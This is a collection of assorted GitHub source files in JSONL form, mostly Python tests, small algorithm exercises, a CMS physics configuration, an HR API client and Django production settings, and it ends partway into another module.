+{"seq_id":"5328222389","text":"import numpy as np\n\nimport pytest\n\nfrom ice_simplex_assimilate.deltize import RawSample, HeightBounds, \\\n    process_sample, post_process_sample, process_ensemble, post_process_ensemble\n\n@pytest.fixture\ndef h_bnd():\n    return HeightBounds.from_interval_widths(np.array([1, 2, 3]))\n\ndef test_create_height_bounds_from_interval_widths(h_bnd):\n    HeightBounds.from_interval_widths(np.array([1, 2, 3]))\n\ndef test_create_height_bounds():\n    HeightBounds(np.array([0, 1, 3, 6]))\n\ndef test_create_raw_sample(h_bnd):\n    area = np.array([0.1, 0.2, 0.3])\n    volume = np.array([0.05, 0.4, 1.0])\n    snow = None\n    RawSample(area, volume, snow)\n\ndef test_process_sample(h_bnd):\n    area = np.array([0.1, 0.2, 0.3])\n    volume = np.array([0.05, 0.4, 1.0])\n    raw_sample = RawSample(area, volume)\n    sample = process_sample(raw_sample, h_bnd)\n    assert np.isclose(1, sample.sum(), atol=1e-20)\n\ndef test_post_process_inverts_process(h_bnd):\n    area = np.array([0.1, 0.2, 0.3])\n    volume = np.array([0.05, 0.4, 1.0])\n    raw_sample = RawSample(area, volume)\n    sample = process_sample(raw_sample, h_bnd)\n    post_sample = post_process_sample(sample, h_bnd)\n    assert np.allclose(raw_sample.area, post_sample.area)\n    assert np.allclose(raw_sample.volume, post_sample.volume)\n\n","repo_name":"oscarlaird/ice_simplex_assimilate","sub_path":"tests/test_deltize.py","file_name":"test_deltize.py","file_ext":"py","file_size_in_byte":1269,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
+{"seq_id":"9182795942","text":"import FWCore.ParameterSet.Config as cms\nprocess = cms.Process(\"ANASKIM\")\n\nprocess.load('Configuration.StandardSequences.Services_cff')\nprocess.load('SimGeneral.HepPDTESSource.pythiapdt_cfi')\nprocess.load('FWCore.MessageService.MessageLogger_cfi')\nprocess.load('Configuration.StandardSequences.GeometryDB_cff')\nprocess.load('Configuration.StandardSequences.MagneticField_38T_cff')\nprocess.load('Configuration.StandardSequences.Reconstruction_cff')\nprocess.load('Configuration.StandardSequences.EndOfProcess_cff')\nprocess.load('Configuration.StandardSequences.FrontierConditions_GlobalTag_cff')\nprocess.load('HeavyIonsAnalysis.Configuration.collisionEventSelection_cff')\nprocess.load('RecoHI.HiCentralityAlgos.HiCentrality_cfi')\nprocess.load('Configuration.EventContent.EventContentHeavyIons_cff')\n\nprocess.source = cms.Source(\"PoolSource\",\n                            fileNames = cms.untracked.vstring(\n'/store/hidata/HIRun2013A/PAHighPt/RECO/PromptReco-v1/000/210/634/FA4E6B7E-7366-E211-8DD0-0019B9F581C9.root'\n)\n)\n# =============== Other Statements =====================\nprocess.maxEvents = cms.untracked.PSet(input = 
cms.untracked.int32(4000))\nprocess.options = cms.untracked.PSet(wantSummary = cms.untracked.bool(True))\nprocess.GlobalTag.globaltag = 'GR_P_V41::All'\n\n# =============== Import Sequences =====================\nprocess.load(\"davidlw.HighPtFlow2011.ppExtraReco_cff\")\nprocess.load(\"davidlw.HighPtFlow2011.PAHighMultiplicityPileUpFilter_cff\")\n\n#Trigger Selection\n### Comment out for the timing being assuming running on secondary dataset with trigger bit selected already\nimport HLTrigger.HLTfilters.hltHighLevel_cfi\nprocess.hltHF = HLTrigger.HLTfilters.hltHighLevel_cfi.hltHighLevel.clone()\nprocess.hltHF.HLTPaths = ['HLT_PAHFSumET*_v*']\nprocess.hltHF.andOr = cms.bool(True)\nprocess.hltHF.throw = cms.bool(False)\n\nprocess.eventFilter_HF = cms.Sequence(\n process.hltHF *\n process.PAcollisionEventSelection *\n process.pAHighMultiplicityPileUpFilter_2Sigma_mode1\n)\nprocess.eventFilter_HF_step = cms.Path( process.eventFilter_HF )\nprocess.extraTrks_HF_step = cms.Path( process.eventFilter_HF * process.ppSingleTrackFilterSequence )\n\nprocess.pACentrality_step = cms.Path( process.eventFilter_HF * process.pACentrality)\nprocess.pACentrality.producePixelhits = False\n\nprocess.load(\"davidlw.HighPtFlow2011.ppanalysisSkimContentFull_cff\")\nprocess.output_HF = cms.OutputModule(\"PoolOutputModule\",\n outputCommands = process.analysisSkimContent.outputCommands,\n fileName = cms.untracked.string('pPb_HF.root'),\n SelectEvents = cms.untracked.PSet(SelectEvents = cms.vstring('eventFilter_HF_step')),\n dataset = cms.untracked.PSet(\n dataTier = cms.untracked.string('AOD'),\n filterName = cms.untracked.string('pPb_HF'))\n)\n\nprocess.output_HF_step = cms.EndPath(process.output_HF)\n\nprocess.schedule = cms.Schedule(\n process.eventFilter_HF_step,\n process.extraTrks_HF_step,\n process.pACentrality_step,\n process.output_HF_step,\n)\n","repo_name":"davidlw/RiceHIG","sub_path":"Skim2013/test/pPbFlowCorrSkim_trigger2013_HFHM_singlefile_cfg.py","file_name":"pPbFlowCorrSkim_trigger2013_HFHM_singlefile_cfg.py","file_ext":"py","file_size_in_byte":2944,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"71343563471","text":"from typing import Optional, Tuple, Union\n\nimport hypothesis.strategies as st\nimport torch\nimport torch.nn as nn\nfrom hypothesis import given, settings\nfrom opacus.layers import DPGRU, DPLSTM, DPRNN\nfrom opacus.utils.packed_sequences import _gen_packed_data\nfrom torch.nn.utils.rnn import PackedSequence\n\nfrom .common import DPModules_test\n\n\ndef rnn_train_fn(\n model: nn.Module,\n x: Union[torch.Tensor, PackedSequence],\n state_init: Optional[Union[torch.Tensor, Tuple[torch.Tensor, torch.Tensor]]] = None,\n):\n model.train()\n criterion = nn.MSELoss()\n logits, _ = model(x, state_init)\n if isinstance(logits, PackedSequence):\n y = torch.zeros_like(logits[0])\n loss = criterion(logits[0], y)\n else:\n y = torch.zeros_like(logits)\n loss = criterion(logits, y)\n loss.backward()\n\n\nclass DPLSTM_test(DPModules_test):\n @given(\n mode=st.one_of(st.just(\"rnn\"), st.just(\"gru\"), st.just(\"lstm\")),\n batch_size=st.integers(1, 5),\n seq_len=st.integers(1, 6),\n emb_size=st.integers(5, 10),\n hidden_size=st.integers(3, 7),\n num_layers=st.integers(1, 3),\n bidirectional=st.booleans(),\n bias=st.booleans(),\n batch_first=st.booleans(),\n zero_init=st.booleans(),\n packed_input_flag=st.integers(0, 2),\n )\n @settings(deadline=20000)\n def test_rnn(\n self,\n mode: str,\n batch_size: int,\n seq_len: int,\n emb_size: int,\n 
hidden_size: int,\n num_layers: int,\n bidirectional: bool,\n bias: bool,\n batch_first: bool,\n zero_init: bool,\n packed_input_flag: int,\n ):\n use_cn = False\n if mode == \"rnn\":\n original_rnn_class = nn.RNN\n dp_rnn_class = DPRNN\n elif mode == \"gru\":\n original_rnn_class = nn.GRU\n dp_rnn_class = DPGRU\n elif mode == \"lstm\":\n original_rnn_class = nn.LSTM\n dp_rnn_class = DPLSTM\n use_cn = True\n else:\n raise ValueError(\"Invalid RNN mode\")\n\n rnn = original_rnn_class(\n emb_size,\n hidden_size,\n num_layers=num_layers,\n batch_first=batch_first,\n bidirectional=bidirectional,\n bias=bias,\n )\n dp_rnn = dp_rnn_class(\n emb_size,\n hidden_size,\n num_layers=num_layers,\n batch_first=batch_first,\n bidirectional=bidirectional,\n bias=bias,\n )\n\n dp_rnn.load_state_dict(rnn.state_dict())\n\n # Packed sequences not happy with deterministic\n torch.use_deterministic_algorithms(False)\n if packed_input_flag == 0:\n # no packed sequence input\n x = (\n torch.randn([batch_size, seq_len, emb_size])\n if batch_first\n else torch.randn([seq_len, batch_size, emb_size])\n )\n elif packed_input_flag == 1:\n # packed sequence input in sorted order\n x = _gen_packed_data(\n batch_size, seq_len, emb_size, batch_first, sorted_=True\n )\n elif packed_input_flag == 2:\n # packed sequence input in unsorted order\n x = _gen_packed_data(\n batch_size, seq_len, emb_size, batch_first, sorted_=False\n )\n else:\n raise ValueError(\"Invalid packed input flag\")\n torch.use_deterministic_algorithms(True)\n\n if zero_init:\n self.compare_forward_outputs(\n rnn,\n dp_rnn,\n x,\n output_names=(\"out\", \"hn\", \"cn\") if use_cn else (\"out\", \"hn\"),\n atol=1e-5,\n rtol=1e-3,\n )\n\n self.compare_gradients(\n rnn,\n dp_rnn,\n rnn_train_fn,\n x,\n atol=1e-5,\n rtol=1e-3,\n )\n\n else:\n num_directions = 2 if bidirectional else 1\n h0 = torch.randn([num_layers * num_directions, batch_size, hidden_size])\n c0 = torch.randn([num_layers * num_directions, batch_size, hidden_size])\n self.compare_forward_outputs(\n rnn,\n dp_rnn,\n x,\n (h0, c0) if use_cn else h0,\n output_names=(\"out\", \"hn\", \"cn\") if use_cn else (\"out\", \"hn\"),\n atol=1e-5,\n rtol=1e-3,\n )\n self.compare_gradients(\n rnn,\n dp_rnn,\n rnn_train_fn,\n x,\n (h0, c0) if use_cn else h0,\n atol=1e-5,\n rtol=1e-3,\n )\n","repo_name":"pytorch/opacus","sub_path":"opacus/tests/dp_layers/dp_rnn_test.py","file_name":"dp_rnn_test.py","file_ext":"py","file_size_in_byte":4749,"program_lang":"python","lang":"en","doc_type":"code","stars":1515,"dataset":"github-code","pt":"83"} +{"seq_id":"32783341545","text":"# Keypad values are for demo. 
You can add mappings for 0 to 9, as on a real phone keypad.\nkeypad = {\n    '1':'abc',\n    '2': 'de',\n    '3': 'fghi'\n}\n\ndef kpCombo(number):\n    if len(number) == 0:\n        return [\"\"]\n    \n    head = keypad[number[0]]\n    apka_ans = kpCombo(number[1:])\n    mera_ans = []\n    for letter in head:\n        for element in apka_ans:\n            mera_ans.append(letter+element)\n    \n    return mera_ans \n    \nprint(kpCombo(\"123\"))\n","repo_name":"Micekey/DSA","sub_path":"Get Keypad Combination (Recursion).py","file_name":"Get Keypad Combination (Recursion).py","file_ext":"py","file_size_in_byte":470,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
+{"seq_id":"39238779424","text":"from consts import MOCK_CLASS_SIZE, MOCK_EXAM_LENGTH\nfrom models import ScoreTable, Examination\nfrom data_operator import VirtualBaseData, IRTEstimate\nimport numpy as np\n\nif __name__ == \"__main__\":\n\n    # generate mock data\n    test_data_obj = VirtualBaseData(MOCK_CLASS_SIZE, MOCK_EXAM_LENGTH)\n\n    # build the base information\n    score_table = ScoreTable(\n        test_data_obj.virtual_exam_paper_info_array,\n        test_data_obj.virtual_exam_people_score_info_array,\n    )\n\n    # create this examination\n    examination = Examination(score_table)\n\n    # filter out zero and perfect scores\n    examination.update_state_at_first()\n\n    # run the estimation\n    test_estimate = IRTEstimate(\n        examination.score_array_for_estimate,\n        np.array(test_data_obj.virtual_student_abilities_list)[examination.effective_student_index],\n        np.array(test_data_obj.virtual_question_difficulties_list)[examination.effective_question_index],\n    )\n    test_estimate.merge_approach()\n","repo_name":"xuqiushi/IRTEstimate","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":965,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
+{"seq_id":"41929156021","text":"import pytest\n\nimport xtgeo\n\n\n@pytest.fixture()\ndef string_to_well(setup_tmpdir):\n    def wrapper(wellstring, **kwargs):\n        \"\"\"It is currently not possible to initiate from spec.\n        We work around by dumping to csv before reloading\n        \"\"\"\n        fpath = \"well_data.rmswell\"\n        with open(fpath, \"w\") as fh:\n            fh.write(wellstring)\n\n        return xtgeo.well_from_file(fpath, **kwargs)\n\n    yield wrapper\n","repo_name":"equinor/xtgeo","sub_path":"tests/test_well/conftest.py","file_name":"conftest.py","file_ext":"py","file_size_in_byte":433,"program_lang":"python","lang":"en","doc_type":"code","stars":106,"dataset":"github-code","pt":"83"}
+{"seq_id":"70533277711","text":"from typing import List\nclass SplitArrayToMinimizeMaxSum:\n    def splitArray(self, nums: List[int], m: int) -> int:\n        def cannot_split(max_sum, m):\n            num_cuts, curr_sum = 0, 0\n            for x in nums:\n                curr_sum += x\n                if curr_sum > max_sum:\n                    num_cuts += 1\n                    curr_sum = x\n            return num_cuts >= m\n\n        low, high = max(nums), sum(nums)\n        while low < high:\n            guess = low + (high - low) // 2\n            if cannot_split(guess, m):\n                low = guess + 1\n            else:\n                high = guess\n        return low\n","repo_name":"alexwu2021/practice","sub_path":"Python/python3/leetcode/Hard/SplitArrayToMinimizeMaxSum.py","file_name":"SplitArrayToMinimizeMaxSum.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
+{"seq_id":"41739196293","text":"my_list = [\"Elie\", \"Tim\", \"Matt\"]\n\nanswer = [name[0] for name in my_list]\nprint(answer)\n\n# Second exercise\nlist_two = [1,2,3,4,5,6]\n\nanswer2 = [num for num in list_two if num % 2 == 0]\nprint(answer2)\n\n# Third exercise\nlist_three = [1,2,3,4]\nlist_four = [3,4,5,6]
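\n# note: for long lists, precompute a set (e.g. seen = set(list_four)) so each membership check below is O(1)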
\n\nanswer3 = [num for num in list_three if num in list_four]\nprint(answer3)\n\n# Fourth exercise\nlist_five = [\"Elie\", \"Tim\", \"Matt\"]\n\nanswer4 = [name[::-1].lower() for name in list_five]\nprint(answer4)","repo_name":"amandathedev/Python-Exercises","sub_path":"list_comprehension.py","file_name":"list_comprehension.py","file_ext":"py","file_size_in_byte":459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
+{"seq_id":"40764819031","text":"def permutation(elements):\n    if len(elements) == 1:\n        return elements\n    else:\n        new_res = []\n        for p in range(len(elements)):\n            temp = elements[:p] + elements[p+1:]\n            result = permutation(temp)\n            for item in result:\n                new_res.append(elements[p] + item)\n        return new_res\n\ndef permute2(nums):\n    if len(nums) == 0:\n        return []\n    elif len(nums) == 1:\n        return [[nums[0]]]\n\n    res = []\n    insert = [nums[0]]\n    small = permute2(nums[1:])\n\n    for item in small:\n        for i in range(len(item) + 1):\n            res.append(item[:i] + insert + item[i:])\n\n    return res\n\ndef permute3(items):\n    from itertools import permutations\n\n    return list(permutations(items, len(items)))\n\n\nif __name__ == '__main__':\n    e = [str(i) for i in range(3)]\n    r = permutation(e)\n    print(r)\n","repo_name":"Zesunlight/Experiment","sub_path":"Python-Learning/Full_Permutation.py","file_name":"Full_Permutation.py","file_ext":"py","file_size_in_byte":872,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"83"}
+{"seq_id":"34704297367","text":"with open(\"test.txt\") as f:\n\ta = f.read().strip().split(\"\\n\\n\")\n\tall_answers = [x.replace(\"\\n\",\"\") for x in a]\n\t#lines = [line.rstrip() for line in f]\nprint(all_answers)\n\nform_set = \"abcdefghijklmnopqrstuvwxyz\"\ndef customCustoms(all_answers):\n\tresult = 0\n\tfor group_answers in all_answers:\n\t\tset_answers = set(\"\".join(group_answers))\n\t\tresult+=len(set_answers)\n\treturn result\nresult = customCustoms(all_answers)\nprint(result)\n\n# def part2(b):\n# \tresult = 0\n# \tfor i in b:\n# \t\tgroups = i.split(\" \")\n# \t\ti = i.replace(\" \",\"\")\n# \t\tanswers = {}\n# \t\tfor char in i:\n# \t\t\tif(char in answers):\n# \t\t\t\tanswers[char] += 1\n# \t\t\telse:\n# \t\t\t\tanswers[char] = 1\n\t\t\n# \t\tnum_groups = len(groups)\n# \t\tfor k, v in answers.items():\n# \t\t\tif(v == num_groups):\n# \t\t\t\tresult+=1\n# \t\t#print(num_groups, answers)\n\n# \treturn result\n\n# result = part2(b)\n# print(result)","repo_name":"Marvinho/Advent-of-Code","sub_path":"2020/day06/day6.py","file_name":"day6.py","file_ext":"py","file_size_in_byte":839,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"}
+{"seq_id":"43137861702","text":"import requests\nimport yaml\nimport json\nfrom time import sleep\n\n\nclass BreezyError(Exception):\n    pass\n\n\nclass BreezyAPI:\n    API_URL = \"https://api.breezy.hr/v3/\"\n\n    def __init__(self):\n        with open('auth.yaml', 'r') as file:\n            config = yaml.safe_load(file)\n        self.email = config['email']\n        self.password = config['password']\n        self.token = self._get_token()\n\n    def call(self, endpoint: str, method: str = 'GET', params: dict = None,\n             data: dict = None) -> dict:\n        assert method in ['GET', 'POST', 'PUT'], 'Wrong method provided'\n        while True:\n            # jsonify data if using POST/PUT methods\n            if method != 'GET':\n                data = json.dumps(data)\n\n            response = requests.request(\n                method,\n                self.API_URL + endpoint,\n                headers={\n                    \"Authorization\": self.token,\n                    \"Accept\": 
\"*/*\",\n \"accept-encoding\": \"gzip, deflate\",\n \"content-type\": \"application/json\"\n },\n params=params,\n data=data\n )\n if response.status_code == 401:\n print('Status code 401, getting new token')\n self.token = self._get_token()\n elif response.status_code == 429:\n print('Exceeded API rate limit, sleeping 10 seconds')\n sleep(10)\n elif response.status_code == 200:\n return response.json()\n elif response.status_code == 204:\n return None\n elif response.status_code == 500:\n raise BreezyError(response.json()['error'])\n elif response.status_code == 504:\n print('504 error, sleeping 30 seconds')\n sleep(30)\n else:\n raise Exception(f'response code: {response.status_code}\\n'\n f'response text: {response.text}')\n\n def _get_token(self) -> str:\n token = requests.post(\n self.API_URL + \"signin\",\n data={\"email\": self.email, \"password\": self.password}\n )\n if token.status_code != 200:\n raise BreezyError('Error obtaining token\\nError '\n f'{token.status_code} > '\n f'{token.json()}')\n return token.json()['access_token']\n","repo_name":"guidovalente/Breezy-API","sub_path":"breezy.py","file_name":"breezy.py","file_ext":"py","file_size_in_byte":2424,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"5065223704","text":"N,M = map(int, input().split())\narr = []\nans = ''\ntotal_hamming = 0\n\nfor i in range(N):\n arr.append(input())\n\nfor i in range(M):\n\n dic = {}\n for j in range(N):\n \n if arr[j][i] not in dic:\n dic[arr[j][i]] = 1\n\n else:\n dic[arr[j][i]] += 1\n\n dic_list = list(dic.items())\n dic_list = sorted(dic_list, key = lambda x : (-x[1], x[0]))\n \n ans += dic_list[0][0]\n total_hamming += N - dic_list[0][1]\n\nprint(ans)\nprint(total_hamming)","repo_name":"gusdn3477/Algorithm_Study","sub_path":"baekjoon/1000~2999/1969_DNA.py","file_name":"1969_DNA.py","file_ext":"py","file_size_in_byte":490,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"38600894254","text":"#!/usr/bin/env python\nimport subprocess\nimport sys\n\n# Run the 'fprettify command with the same command line parameters\nnew_command = ['fprettify'] + sys.argv[1:]\n# We put everything on one stream otherwise we should use threads\n# to check and avoid locks\nproc = subprocess.Popen(new_command, \n stdout=subprocess.PIPE, stderr=subprocess.STDOUT) \n# Get stdout and stderr\nouts, _ = proc.communicate()\n# I write anyway to stderr\nif outs is not None:\n if hasattr(sys.stderr, 'buffer'): # for Py3\n sys.stderr.buffer.write(outs)\n else:\n sys.stderr.write(outs)\n\n# Return non-zero if there is any output. 
Replicate output\n# (Note that output is printed as it comes)\nretcode = proc.returncode\nif retcode == 0 and outs:\n retcode = 200\n \nsys.exit(retcode)\n","repo_name":"optados-developers/optados","sub_path":"optados/test-suite/tools/fprettify-wrapper.py","file_name":"fprettify-wrapper.py","file_ext":"py","file_size_in_byte":777,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"83"} +{"seq_id":"31570942406","text":"from .base import *\n\nfrom decouple import Csv, config\n\n# SECURITY WARNING: keep the secret key used in production secret!\nSECRET_KEY = config('SECRET_KEY')\n\n# SECURITY WARNING: don't run with debug turned on in production!\nDEBUG = config('DEBUG', default=False, cast=bool)\n\nALLOWED_HOSTS = config('ALLOWED_HOSTS', cast=Csv())\n\n# Database\n# https://docs.djangoproject.com/en/3.0/ref/settings/#databases\n\nDATABASES = {\n 'default': {\n 'ENGINE': 'django.db.backends.postgresql_psycopg2',\n 'NAME': config('DB_NAME'),\n 'USER': config('DB_USER'),\n 'PASSWORD': config('DB_PASSWORD'),\n 'HOST': config('DB_HOST'),\n 'PORT': config('DB_PORT'),\n }\n}\n\n\n# Rest Api\n\nREST_FRAMEWORK['DEFAULT_RENDERER_CLASSES'] = (\n 'rest_framework.renderers.JSONRenderer',\n)\n\n\n# Email - Mailgun\n\nEMAIL_HOST = 'smtp.eu.mailgun.org'\nEMAIL_PORT = 587\nEMAIL_HOST_USER = config('EMAIL_HOST_USER')\nEMAIL_HOST_PASSWORD = config('EMAIL_HOST_PASSWORD')\nEMAIL_USE_TLS = True\n\n\n# Cookies\n\nCSRF_COOKIE_SECURE = True\nSESSION_COOKIE_SECURE = True\n\n\n# Python social auth\n\nSOCIAL_AUTH_GITHUB_KEY = config('SOCIAL_AUTH_GITHUB_KEY')\nSOCIAL_AUTH_GITHUB_SECRET = config('SOCIAL_AUTH_GITHUB_SECRET')\n\nSOCIAL_AUTH_GOOGLE_OAUTH2_KEY = config('SOCIAL_AUTH_GOOGLE_OAUTH2_KEY')\nSOCIAL_AUTH_GOOGLE_OAUTH2_SECRET = config('SOCIAL_AUTH_GOOGLE_OAUTH2_SECRET')\n\n# Sentry \n\nimport sentry_sdk\nfrom sentry_sdk.integrations.django import DjangoIntegration\n\nsentry_sdk.init(\n dsn=\"https://ba59b807fba94d9680144eb6bc86e9f1@o318909.ingest.sentry.io/5242620\",\n integrations=[DjangoIntegration()],\n\n # If you wish to associate users to errors (assuming you are using\n # django.contrib.auth) you may enable sending PII data.\n send_default_pii=True\n)\n\n\n# S3\n\nAWS_ACCESS_KEY_ID = config('AWS_ACCESS_KEY_ID')\nAWS_SECRET_ACCESS_KEY = config('AWS_SECRET_ACCESS_KEY')\nAWS_STORAGE_BUCKET_NAME = config('AWS_STORAGE_BUCKET_NAME')\n\nDEFAULT_FILE_STORAGE = 'storages.backends.s3boto3.S3Boto3Storage'\nAWS_S3_REGION_NAME = 'eu-west-2'\n\n\nAWS_S3_CUSTOM_DOMAIN = '%s.s3.amazonaws.com' % AWS_STORAGE_BUCKET_NAME\nAWS_S3_OBJECT_PARAMETERS = {\n 'CacheControl': 'max-age=31536000',\n}\nAWS_LOCATION = 'static'\n\nSTATIC_URL = 'https://%s/%s/' % (AWS_S3_CUSTOM_DOMAIN, AWS_LOCATION)\nSTATICFILES_STORAGE = 'storages.backends.s3boto3.S3Boto3Storage'","repo_name":"maxamuss/code-atlas","sub_path":"codeatlas/settings/production.py","file_name":"production.py","file_ext":"py","file_size_in_byte":2316,"program_lang":"python","lang":"en","doc_type":"code","stars":33,"dataset":"github-code","pt":"83"} +{"seq_id":"678917851","text":"import numpy as np\nimport random\nfrom player import ConnectPlayer\n# from connect_nn import NNAction, AlphaZeroNN\nfrom collections import Counter\nfrom human_play import HumanPlay\n\n\nclass ConnectFourGame:\n def __init__(self, nn_a=None, nn_b=None):\n self.board = np.zeros((6, 7))\n self.player_list = [ConnectPlayer('a', 1, nn_a), ConnectPlayer('b', 2, nn_b)]\n random.shuffle(self.player_list)\n # self.player_list[0].counter = 1\n # self.player_list[1].counter 
= 2\n self.player_turn = [1, 0]\n self.grid_increase = [(1, 0), (1, 1), (0, 1), (-1, 1), (-1, 0), (-1, -1), (0, -1), (1, -1)]\n self.grid_increase = [np.array(i) for i in self.grid_increase]\n\n def action_board(self, action, counter):\n for i in range(6):\n if self.board[5 - i, action] == 0:\n self.board[5 - i, action] = counter\n break\n\n def grid_check(self, start_pos, counter):\n consecutive_counter = 1\n if self.board[start_pos] != counter:\n return False\n for grid in self.grid_increase:\n for i in range(1, 4):\n current_pos = tuple(np.array(start_pos) + i * grid)\n if current_pos[0] < 0 or current_pos[1] < 0:\n consecutive_counter = 1\n break\n try:\n if self.board[current_pos] == counter:\n consecutive_counter += 1\n else:\n consecutive_counter = 1\n break\n if consecutive_counter == 4:\n return True\n except Exception as e:\n # print(e)\n consecutive_counter = 1\n break\n return False\n\n def identify_win(self, counter):\n for row in range(6):\n for column in range(7):\n if self.grid_check((5 - row, 6 - column), counter):\n return True\n return False\n\n def run_game(self):\n four_row = False\n player_turn = 0\n player = None\n while not four_row:\n player = self.player_list[player_turn]\n action = player.action(self.board)\n self.action_board(action, player.counter)\n four_row = self.identify_win(player.counter)\n player_turn = self.player_turn[player_turn]\n if np.count_nonzero(self.board) == 42:\n break\n # print(self.board)\n if np.count_nonzero(self.board) == 42:\n return 'draw'\n else:\n return player\n\n def check_end(self, state, counter):\n self.board = state\n opponent_counter = 1 if counter == 2 else 2\n if self.identify_win(counter):\n return 1\n if self.identify_win(opponent_counter):\n return -1\n else:\n return 0\n\n\n\n\nclass HumanGame:\n def __init__(self, nn_class, human_play):\n self.nn_a = nn_class(load_filepath='q_model.h5', epsilon=0)\n self.b_human = human_play()\n self.game = None\n\n def run_game(self):\n self.game = ConnectFourGame(self.nn_a, self.b_human)\n self.game.run_game()\n\n\n\n# if __name__ == '__main__':\n# # rl = MultipleGames(NNAction)\n# # rl.simulate_many_games(100000)\n#\n# rl = AlphaZero()\n# rl.iterate_models()\n\n # rl = HumanGame(NNAction, HumanPlay)\n # rl.run_game()\n","repo_name":"SharedModels/ConnectFour","sub_path":"base_game.py","file_name":"base_game.py","file_ext":"py","file_size_in_byte":3452,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"31482140130","text":"import torch.nn as nn\n\n\nclass MyNet(nn.Module):\n def __init__(self):\n super(MyNet, self).__init__()\n\n # Convolutional layers\n self.conv_layers = nn.Sequential (\n\n # First convolutional layer\n nn.Conv2d(in_channels=3, out_channels=6, kernel_size=3, padding=1, bias=False),\n nn.BatchNorm2d(num_features=6),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=2, stride=2),\n\n # Second convolutional layer\n nn.Conv2d(in_channels=6, out_channels=12, kernel_size=3, padding=1, bias=False),\n nn.BatchNorm2d(num_features=12),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=2, stride=2),\n\n # Third convolutional layer\n nn.Conv2d(in_channels=12, out_channels=24, kernel_size=3, padding=1, bias=False),\n nn.BatchNorm2d(num_features=24),\n nn.ReLU(inplace=True),\n nn.MaxPool2d(kernel_size=2, stride=2),\n )\n\n # Fully connected layers\n self.fc_layers = nn.Sequential (\n\n # Dropout layer\n nn.Dropout(p=0.1),\n\n # First fully connected layer\n nn.Linear(in_features=24 * 4 * 4, out_features=192),\n 
nn.ReLU(inplace=True),\n\n            # Second fully connected layer\n            nn.Linear(in_features=192, out_features=96),\n            nn.ReLU(inplace=True),\n\n            # Third fully connected layer\n            nn.Linear(in_features=96, out_features=10),\n        )\n\n\n    def forward(self, x):\n\n        # Convolutional layers\n        x = self.conv_layers(x)\n\n        # Flatten\n        x = x.view(-1, 24 * 4 * 4)\n\n        # Fully connected layers\n        x = self.fc_layers(x)\n\n        return x\n","repo_name":"vincentfpgarcia/from-pytorch-to-coreml","sub_path":"model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1741,"program_lang":"python","lang":"en","doc_type":"code","stars":174,"dataset":"github-code","pt":"83"} +{"seq_id":"74759857871","text":"N = int(input())\ncows = input()\n\ncount = 0\nflag = False\n\nblanks = []\n\nfor i in range(N):\n    if cows[i] == \"0\":\n        flag = True\n        count += 1\n\n    if (cows[i] == \"1\" or i == N-1) and flag:\n        blanks.append(count+1)\n        flag = False\n        count = 0\n\n# One empty chain\nif len(blanks) == 1:\n    if cows[0] == cows[-1] == \"1\":\n        print(blanks[0] // 3)\n    elif cows[0] == \"1\" or cows[-1] == \"1\":\n        print(blanks[0] // 2)\n    else:\n        print(blanks[0] - 2)\n\n# Two empty chains\nelif len(blanks) == 2:\n    if cows[0] == cows[-1] == \"0\":\n        print(min(blanks[0]-1, blanks[1]-1))\n    else:\n        print(min(blanks[0]//2, blanks[1]//2))\n\n# More than 2 empty chains\nelse:\n    dists = []\n\n    # Case 1: (right, max1) and (left, max2)\n    if blanks[-1] != max(blanks) and blanks[0] != max(blanks):\n        b = blanks.copy()\n        if cows[-1] == \"1\":\n            b[b.index(max(b))] = max(b) // 2\n            b[-1] //= 2\n            dists.append(min(b))\n        elif cows[-1] == \"0\":\n            b[b.index(max(b))] = max(b) // 2\n            b.pop(-1)\n            dists.append(min(b))\n\n        b = blanks.copy()\n        if cows[0] == \"1\":\n            b[b.index(max(b))] = max(b) // 2\n            b[0] //= 2\n            dists.append(min(b))\n        elif cows[0] == \"0\":\n            b[b.index(max(b))] = max(b) // 2\n            b.pop(0)\n            dists.append(min(b))\n\n    # Case 2: (max1, max2), not including right and left\n    b = blanks.copy()\n    b.pop(0)\n    b.pop(-1)\n\n    if len(b) >= 4:\n        b[b.index(max(b))] = max(b) // 2\n        b[b.index(max(b))] = max(b) // 2\n        dists.append(min(b))\n\n    # Case 3: (right, left)\n    b = blanks.copy()\n\n    if cows[0] == \"1\" and cows[-1] == \"1\":\n        b[0] //= 2\n        b[-1] //= 2\n        dists.append(min(b))\n    elif cows[0] == \"0\" and cows[-1] == \"1\":\n        b[-1] //= 2\n        dists.append(min(b))\n    elif cows[0] == \"1\" and cows[-1] == \"0\":\n        b[0] //= 2\n        dists.append(min(b))\n    elif cows[0] == \"0\" and cows[-1] == \"0\":\n        dists.append(min(b))\n\n    # Case 4: (double)\n    b = blanks.copy()\n    b[b.index(max(b))] = max(b) // 3\n    dists.append(min(b))\n\n    print(max(dists))\n","repo_name":"Togohogo1/Programming-Problems","sub_path":"USACO/USACO_20_Open_B1_Social_Distancing_I.py","file_name":"USACO_20_Open_B1_Social_Distancing_I.py","file_ext":"py","file_size_in_byte":2187,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"83"} +{"seq_id":"9475941386","text":"#!/usr/bin/env python3\n\"\"\"This module is used for argument utilities.\"\"\"\n\nimport argparse # argument parser for filters\nimport glob # file lookup\nimport os # path work\nimport 